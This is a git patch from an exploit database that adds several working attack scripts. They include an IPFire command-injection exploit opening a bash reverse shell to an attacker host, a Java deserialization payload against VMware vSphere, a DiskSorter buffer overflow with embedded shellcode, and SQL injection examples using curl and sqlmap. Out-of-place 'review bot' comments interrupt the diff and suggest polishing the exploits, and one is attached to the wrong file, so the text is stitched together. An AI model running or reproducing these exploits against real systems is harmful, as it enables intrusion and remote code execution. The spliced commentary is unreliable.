From dea52f68f513756be8a8ca94c9b36a49939d12b6 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Mon, 12 Jun 2017 05:01:24 +0000 Subject: [PATCH] DB: 2017-06-12 8 new exploits Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC) Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow VMware vSphere Data Protection 5.x/6.x - Java Deserialization EFS Easy Chat Server 3.1 - Buffer Overflow (SEH) IPFire 2.19 - Remote Code Execution eCom Cart 1.3 - SQL Injection EFS Easy Chat Server 3.1 - Password Disclosure EFS Easy Chat Server 3.1 - Password Reset PaulShop - SQL Injection
---
 files.csv | 10 ++-
 platforms/linux/webapps/42149.py | 45 ++++++++++++
 platforms/multiple/remote/42152.py | 50 ++++++++++++++
 platforms/php/webapps/42151.txt | 28 ++++++++
 platforms/php/webapps/42156.txt | 14 ++++
 platforms/windows/local/42157.py | 87 +++++++++++++++++++++++
 platforms/windows/remote/42155.py | 106 +++++++++++++++++++++++++++++
 platforms/windows/webapps/42153.py | 40 +++++++++++
 platforms/windows/webapps/42154.py | 45 ++++++++++++
 9 files changed, 424 insertions(+), 1 deletion(-)
 create mode 100755 platforms/linux/webapps/42149.py
 create mode 100755 platforms/multiple/remote/42152.py
 create mode 100755 platforms/php/webapps/42151.txt
 create mode 100755 platforms/php/webapps/42156.txt
 create mode 100755 platforms/windows/local/42157.py
 create mode 100755 platforms/windows/remote/42155.py
 create mode 100755 platforms/windows/webapps/42153.py
 create mode 100755 platforms/windows/webapps/42154.py
diff --git a/files.csv b/files.csv
index c11c59888..38f6cd37c 100644
--- a/files.csv
+++ b/files.csv
@@ -5526,7 +5526,7 @@ id,file,description,date,author,platform,type,port
 42104,platforms/multiple/dos/42104.js,"WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope",2017-06-01,"Google Security Research",multiple,dos,0
 42108,platforms/multiple/dos/42108.html,"WebKit - 'Element::setAttributeNodeNS' Use-After-Free",2017-06-01,"Google Security Research",multiple,dos,0
 42110,platforms/linux/dos/42110.txt,"reiserfstune 3.6.25 - Local Buffer Overflow",2017-06-02,"Nassim Asrir",linux,dos,0
-42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-02,n3ckD_,windows,dos,0
+42112,platforms/windows/dos/42112.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)",2017-06-02,n3ckD_,windows,dos,0
 42115,platforms/linux/dos/42115.txt,"DNSTracer 1.8.1 - Buffer Overflow",2017-06-05,FarazPajohan,linux,dos,0
 42123,platforms/multiple/dos/42123.txt,"Wireshark 2.2.6 - IPv6 Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
 42124,platforms/multiple/dos/42124.txt,"Wireshark 2.2.0 to 2.2.12 - ROS Dissector Denial of Service",2017-06-05,OSS-Fuzz,multiple,dos,0
@@ -9044,6 +9044,7 @@ id,file,description,date,author,platform,type,port
 42142,platforms/windows/local/42142.rb,"Windows - UAC Protection Bypass via FodHelper Registry Key (Metasploit)",2017-06-08,Metasploit,windows,local,0
 42145,platforms/multiple/local/42145.c,"Apple macOS 10.12.3 / iOS < 10.3.2 - Userspace Entitlement Checking Race Condition",2017-06-09,"Google Security Research",multiple,local,0
 42146,platforms/macos/local/42146.sh,"Apple macOS - Disk Arbitration Daemon Race Condition",2017-06-09,phoenhex,macos,local,0
+42157,platforms/windows/local/42157.py,"Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow",2017-06-10,abatchy17,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -15583,6 +15584,8 @@ id,file,description,date,author,platform,type,port
 42125,platforms/macos/remote/42125.txt,"Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution",2017-06-06,saelo,macos,remote,0
 42128,platforms/windows/remote/42128.txt,"Home Web Server 1.9.1 build 164 - Remote Code Execution",2017-05-26,"Guillaume Kaddouch",windows,remote,0
 42134,platforms/python/remote/42134.rb,"DC/OS Marathon UI - Docker Exploit (Metasploit)",2017-06-07,Metasploit,python,remote,0
+42152,platforms/multiple/remote/42152.py,"VMware vSphere Data Protection 5.x/6.x - Java Deserialization",2017-06-10,"Kelly Correll",multiple,remote,0
+42155,platforms/windows/remote/42155.py,"EFS Easy Chat Server 3.1 - Buffer Overflow (SEH)",2017-06-09,"Aitezaz Mohsin",windows,remote,0
 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0
 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0
 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0
@@ -37978,3 +37981,8 @@ id,file,description,date,author,platform,type,port
 42132,platforms/php/webapps/42132.txt,"Xavier 2.4 - SQL Injection",2017-06-07,Vulnerability-Lab,php,webapps,0
 42133,platforms/php/webapps/42133.txt,"Robert 0.5 - Multiple Vulnerabilities",2017-06-07,"Cyril Vallicari",php,webapps,0
 42143,platforms/php/webapps/42143.txt,"Craft CMS 2.6 - Cross-Site Scripting",2017-06-08,"Ahsan Tahir",php,webapps,0
+42149,platforms/linux/webapps/42149.py,"IPFire 2.19 - Remote Code Execution",2017-06-09,0x09AL,linux,webapps,0
+42151,platforms/php/webapps/42151.txt,"eCom Cart 1.3 - SQL Injection",2017-06-10,"Alperen Eymen Ozcan",php,webapps,0
+42153,platforms/windows/webapps/42153.py,"EFS Easy Chat Server 3.1 - Password Disclosure",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
+42154,platforms/windows/webapps/42154.py,"EFS Easy Chat Server 3.1 - Password Reset",2017-06-09,"Aitezaz Mohsin",windows,webapps,0
+42156,platforms/php/webapps/42156.txt,"PaulShop - SQL Injection",2017-06-10,Se0pHpHack3r,php,webapps,0
diff --git a/platforms/linux/webapps/42149.py b/platforms/linux/webapps/42149.py
new file mode 100755
index 000000000..fd9b7ff99
--- /dev/null
+++ b/platforms/linux/webapps/42149.py
@@ -0,0 +1,45 @@ +# +# Title : IPFire 2.19 Firewall Post-Auth RCE +# Date : 09/06/2017 +# Author : 0x09AL (https://twitter.com/0x09AL) +# Tested on: IPFire 2.19 (x86_64) - Core Update 110 +# Vendor : http://www.ipfire.org/ +# Software : http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso +# Vulnerability Description: +# The file ids.cgi doesn't sanitize the OINKCODE parameter and gets passed to a system call which call wget. +# You need valid credentials to exploit this vulnerability or you can exploit it through CSRF. +# +# + +import requests + + +# Adjust the ip and ports. + +revhost = '192.168.56.1' +revport = 1337 +url = 'https://192.168.56.102:444/cgi-bin/ids.cgi' +username = 'admin' +password = 'admin' + + +payload = 'bash -i >& /dev/tcp/' + revhost + '/' + str(revport) + ' 0>&1' +evildata = {'ENABLE_SNORT_GREEN':'on','ENABLE_SNORT':'on','RULES':'registered','OINKCODE': '`id`','ACTION': 'Download new ruleset','ACTION2':'snort'} +headers = {'Accept-Encoding' : 'gzip, deflate, br','Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8','User-Agent':'IPFIRE Exploit','Referer': url,'Upgrade-Insecure-Requests':'1'} + + +def verifyVuln(): + req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) # Verify false is added because most of the time the certificate is self signed. + if(req.status_code == 200 and "uid=99(nobody)" in req.text): + print "[+] IPFire Installation is Vulnerable [+]" + revShell() + else: + print "[+] Not Vulnerable [+]" + +def revShell(): + evildata["OINKCODE"] = '`' + payload + '`' + print "[+] Sending Malicious Payload [+]" + req = requests.post(url,data=evildata,headers=headers,auth=(username,password),verify=False) + + +verifyVuln() diff --git a/platforms/multiple/remote/42152.py b/platforms/multiple/remote/42152.py new file mode 100755 index 000000000..e027398ed --- /dev/null +++ b/platforms/multiple/remote/42152.py 
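Review bot: `verifyVuln()` is invoked at module level on the last line of the hunk, so merely importing the file (for example to inspect it) performs the authenticated request; guard it with `if __name__ == "__main__":` / `    verifyVuln()`. The `print "..."` statements are Python 2 syntax and the header's "Tested on" line names only the target, so the interpreter version the script was written for should be stated there as well. The `verify=False` comment on the request line is the only place the self-signed-certificate assumption is recorded; repeating it in the header description would let a reader see it without reading the code.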
@@ -0,0 +1,50 @@ +#!/usr/bin/env python + + +import socket +import sys +import ssl + + +def getHeader(): + return '\x4a\x52\x4d\x49\x00\x02\x4b' + +def payload(): + cmd = sys.argv[4] + cmdlen = len(cmd) + data2 = '\x00\x09\x31\x32\x37\x2e\x30\x2e\x31\x2e\x31\x00\x00\x00\x00\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x44\x15\x4d\xc9\xd4\xe6\x3b\xdf\x74\x00\x05\x70\x77\x6e\x65\x64\x73\x7d\x00\x00\x00\x01\x00\x0f\x6a\x61\x76\x61\x2e\x72\x6d\x69\x2e\x52\x65\x6d\x6f\x74\x65\x70\x78\x72\x00\x17\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x50\x72\x6f\x78\x79\xe1\x27\xda\x20\xcc\x10\x43\xcb\x02\x00\x01\x4c\x00\x01\x68\x74\x00\x25\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x72\x65\x66\x6c\x65\x63\x74\x2f\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x32\x73\x75\x6e\x2e\x72\x65\x66\x6c\x65\x63\x74\x2e\x61\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x2e\x41\x6e\x6e\x6f\x74\x61\x74\x69\x6f\x6e\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x48\x61\x6e\x64\x6c\x65\x72\x55\xca\xf5\x0f\x15\xcb\x7e\xa5\x02\x00\x02\x4c\x00\x0c\x6d\x65\x6d\x62\x65\x72\x56\x61\x6c\x75\x65\x73\x74\x00\x0f\x4c\x6a\x61\x76\x61\x2f\x75\x74\x69\x6c\x2f\x4d\x61\x70\x3b\x4c\x00\x04\x74\x79\x70\x65\x74\x00\x11\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x70\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x71\x00\x7e\x00\x00\x73\x71\x00\x7e\x00\x05\x73\x7d\x00\x00\x00\x01\x00\x0d\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x4d\x61\x70\x70\x78\x71\x00\x7e\x00\x02\x73\x71\x00\x7e\x00\x05\x73\x72\x00\x2a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x
2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x6d\x61\x70\x2e\x4c\x61\x7a\x79\x4d\x61\x70\x6e\xe5\x94\x82\x9e\x79\x10\x94\x03\x00\x01\x4c\x00\x07\x66\x61\x63\x74\x6f\x72\x79\x74\x00\x2c\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x68\x61\x69\x6e\x65\x64\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x30\xc7\x97\xec\x28\x7a\x97\x04\x02\x00\x01\x5b\x00\x0d\x69\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x73\x74\x00\x2d\x5b\x4c\x6f\x72\x67\x2f\x61\x70\x61\x63\x68\x65\x2f\x63\x6f\x6d\x6d\x6f\x6e\x73\x2f\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2f\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\x70\x78\x70\x75\x72\x00\x2d\x5b\x4c\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x3b\xbd\x56\x2a\xf1\xd8\x34\x18\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x05\x73\x72\x00\x3b\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x43\x6f\x6e\x73\x74\x61\x6e\x74\x54\x72\x61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x58\x76\x90\x11\x41\x02\xb1\x94\x02\x00\x01\x4c\x00\x09\x69\x43\x6f\x6e\x73\x74\x61\x6e\x74\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x70\x78\x70\x76\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x52\x75\x6e\x74\x69\x6d\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x73\x72\x00\x3a\x6f\x72\x67\x2e\x61\x70\x61\x63\x68\x65\x2e\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x63\x6f\x6c\x6c\x65\x63\x74\x69\x6f\x6e\x73\x2e\x66\x75\x6e\x63\x74\x6f\x72\x73\x2e\x49\x6e\x76\x6f\x6b\x65\x72\x54\x72\x
61\x6e\x73\x66\x6f\x72\x6d\x65\x72\x87\xe8\xff\x6b\x7b\x7c\xce\x38\x02\x00\x03\x5b\x00\x05\x69\x41\x72\x67\x73\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f\x62\x6a\x65\x63\x74\x3b\x4c\x00\x0b\x69\x4d\x65\x74\x68\x6f\x64\x4e\x61\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x0b\x69\x50\x61\x72\x61\x6d\x54\x79\x70\x65\x73\x74\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x43\x6c\x61\x73\x73\x3b\x70\x78\x70\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x70\x78\x70\x00\x00\x00\x02\x74\x00\x0a\x67\x65\x74\x52\x75\x6e\x74\x69\x6d\x65\x75\x72\x00\x12\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x43\x6c\x61\x73\x73\x3b\xab\x16\xd7\xae\xcb\xcd\x5a\x99\x02\x00\x00\x70\x78\x70\x00\x00\x00\x00\x74\x00\x09\x67\x65\x74\x4d\x65\x74\x68\x6f\x64\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\xa0\xf0\xa4\x38\x7a\x3b\xb3\x42\x02\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x24\x73\x71\x00\x7e\x00\x1c\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x02\x70\x75\x71\x00\x7e\x00\x21\x00\x00\x00\x00\x74\x00\x06\x69\x6e\x76\x6f\x6b\x65\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x02\x76\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x76\x71\x00\x7e\x00\x21\x73\x71\x00\x7e\x00\x1c\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x74' + data2 += '\x00' + chr(cmdlen) + data2 += cmd + data2 += 
'\x74\x00\x04\x65\x78\x65\x63\x75\x71\x00\x7e\x00\x24\x00\x00\x00\x01\x71\x00\x7e\x00\x29\x73\x71\x00\x7e\x00\x17\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75\x65\x70\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00\x70\x78\x70\x00\x00\x00\x01\x73\x71\x00\x7e\x00\x09\x3f\x40\x00\x00\x00\x00\x00\x10\x77\x08\x00\x00\x00\x10\x00\x00\x00\x00\x78\x78\x76\x72\x00\x12\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x76\x65\x72\x72\x69\x64\x65\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x78\x70\x71\x00\x7e\x00\x3f\x78\x71\x00\x7e\x00\x3f' + return data2 + +def sslMode(): + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) + return ssl.wrap_socket(sock, ssl_version=ssl.PROTOCOL_TLSv1, ciphers="ALL") + +def exploitTarget(sock): + server_address = (sys.argv[1], int(sys.argv[2])) + print 'connecting to %s port %s' % server_address + sock.connect(server_address) + print 'sending exploit headers\n' + sock.send(getHeader()) + sock.recv(8192) + print 'sending exploit\n' + sock.send(payload()) + sock.close() + print 'exploit completed.' + +if __name__ == "__main__": + if len(sys.argv) != 5: + print 'Usage: python ' + sys.argv[0] + ' host port ssl cmd' + print 'ie: python ' + sys.argv[0] + ' 192.168.1.100 1099 false "ping -c 4 yahoo.com"' + sys.exit(0) + else: + sock = None + if sys.argv[3] == "true" or sys.argv[3] == "TRUE" or sys.argv[3] == True: + sock = sslMode() + if sys.argv[3] == "false" or sys.argv[3] == "FALSE" or sys.argv[3] == False: + sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) + exploitTarget(sock) + + diff --git a/platforms/php/webapps/42151.txt b/platforms/php/webapps/42151.txt new file mode 100755 index 000000000..57d6996e0 --- /dev/null +++ b/platforms/php/webapps/42151.txt 
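Review bot: In the `__main__` block, `sys.argv[3] == True` and `sys.argv[3] == False` compare a string with a bool and can never be true, so those alternatives are dead, and any spelling other than the four literal ones leaves `sock` as `None` so `exploitTarget(sock)` fails with an AttributeError instead of the usage message. Normalise once and reject anything else: `mode = sys.argv[3].lower()`, `if mode not in ("true", "false"): sys.exit('ssl must be "true" or "false"')`, `sock = sslMode() if mode == "true" else socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP)`. `sslMode` pins `ssl.PROTOCOL_TLSv1` and uses `ssl.wrap_socket`, both of which are deprecated in current Python (the latter removed in 3.12), so the header should record the Python version this was run with. This file is also the only new script in the commit with no header block naming product, version, date or author.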
@@ -0,0 +1,28 @@ +# Exploit Title: eCom Cart 1.3 Exploit +# Google Dork: inurl:"/pdetails/11" ([11] is variable) +# Date: 10.06.2017 +# Exploit Author: Alperen Eymen Ozcan & Batuhan Camci +# Vendor Homepage: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 +# Software Link: https://codecanyon.net/item/ecom-cart-a-php-shopping-cart-with-blog/13731007 +# Version: 1.3 +# Tested on: Linux + + + +$ curl http://localhost/ecom-cart/charge.php -d order_id=%271 + +Fatal error: Uncaught PDOException: SQLSTATE[42000]: Syntax error or access +violation: 1064 You have an error in your SQL syntax; check the manual +that corresponds to your MariaDB server version for the right syntax +to use near '1'' at line 1 in +/customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php:16 +Stack trace: +#0 /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php(16): +PDO->query('SELECT * FROM 3...') +#1 {main} + thrown in /customers/4/4/9/lobisdev.one/httpd.www/ecom-cart/charge.php +on line 16 + +$ sqlmap -u "http://www.lobisdev.one/ecom-cart/charge.php' --data=order_id=1 --dbs + + diff --git a/platforms/php/webapps/42156.txt b/platforms/php/webapps/42156.txt new file mode 100755 index 000000000..cffcb500c --- /dev/null +++ b/platforms/php/webapps/42156.txt @@ -0,0 +1,14 @@ +# Exploit Title: [PaulShop CMS <= 2017-03-25 Sql Injection] +# Date: [10-06-2017] +# Exploit Author: [Se0pHpHack3r] +# Vendor Homepage: [https://codecanyon.net/item/paulshop-cms-with-shopping-cart-system/18070714] +# Version: [2017-03-25] + +1. Description + +SQL Injection on Shipping Cost page in Cart, with "country" & "weight" parameter (GET) + +2. Examples + +http://localhost/shop/en/cart/shipping_cost?country=[SQL INJECTION HERE] +http://localhost/shop/en/cart/shipping_cost?country=TH&weight=[SQL INJECTION HERE] \ No newline at end of file diff --git a/platforms/windows/local/42157.py b/platforms/windows/local/42157.py new file mode 100755 index 000000000..ef38cddbd --- /dev/null 
+++ b/platforms/windows/local/42157.py 
@@ -0,0 +1,87 @@ +#!/usr/bin/python + +############################################################################### +# Exploit Title: DiskSorter v9.7.14 - Local Buffer Overflow +# Date: 10-06-2017 +# Exploit Author: abatchy17 -- @abatchy17 +# Vulnerable Software: DiskSorter v9.7.14 +# Vendor Homepage: http://www.disksorter.com/ +# Version: 9.7.14 +# Software Link: http://www.disksorter.com/setups/disksorter_setup_v9.7.14.exe +# Tested On: Windows XP SP3 +# +# To trigger the exploit, paste the content of exploit.txt into "Add Input Directory" text box +# +# Credit to n3ckD_ for discovering the DoS exploit +# +# Challenges to convert this DoS to code execution: +# 1. Program doesn't accept non ASCII characters (0x01 to 0xff are okay-ish) +# 2. Buffer at ESP splits string if it contains a "\", this is bad since POP ESP is 0x5c +# 3. Had to write custom shellcode to get the exact location of alphanumeric shellcode in memory +# +# +----------------------------------+ +# |1 custom shellcode == 1 dead llama| +# +----------------------------------+ +# +############################################################################## + +a = open("exploit.txt", "w") + +# Message= 0x651f214e : jmp esp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False + +badchars = "\x0a\x0d\x2f" + +# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f" +buf = "" +buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30" +buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42" +buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49" +buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43" +buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b" +buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63" +buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37" +buf 
+= "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55" +buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f" +buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70" +buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c" +buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37" +buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51" +buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32" +buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61" +buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69" +buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d" +buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33" +buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76" +buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47" +buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50" +buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50" +buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f" +buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53" +buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50" +buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30" +buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65" +buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d" +buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a" +buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50" +buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63" +buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54" +buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41" + +jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! 
+ +llamaleftovers = ( + "\x55" # push EBP + "\x58" # pop EAX + "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 + "\x05\x55\x55\x55\x55" # add EAX, 0x55555555 + "\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 209 + "\x40" # inc EAX, shellcode generated should start exactly here (EBP + 210) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode + ) + +junk = "\x55" + + "\x53\x5b" * 105 + +data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf + +a.write(data) +a.close() diff --git a/platforms/windows/remote/42155.py b/platforms/windows/remote/42155.py new file mode 100755 index 000000000..fc6fd68b5 --- /dev/null +++ b/platforms/windows/remote/42155.py 
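Review bot: `a = open("exploit.txt", "w")` is opened near the top of the script and only released by the explicit `a.close()` on the last line, so any exception while `data` is being assembled leaks the handle; open it where it is written, `with open("exploit.txt", "w") as out:` / `    out.write(data)`. `badchars` is assigned but never referenced, so it only restates the `-b "\x0a\x0d\x2f"` argument in the msfvenom comment and should live there. The `# Message= 0x651f214e : jmp esp` line documents an address the script never uses, while the `jmpebp` bytes decode to a different address; either say why the `jmp esp` candidate was rejected (the `jmpebp` comment hints at it) or drop the stale line.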
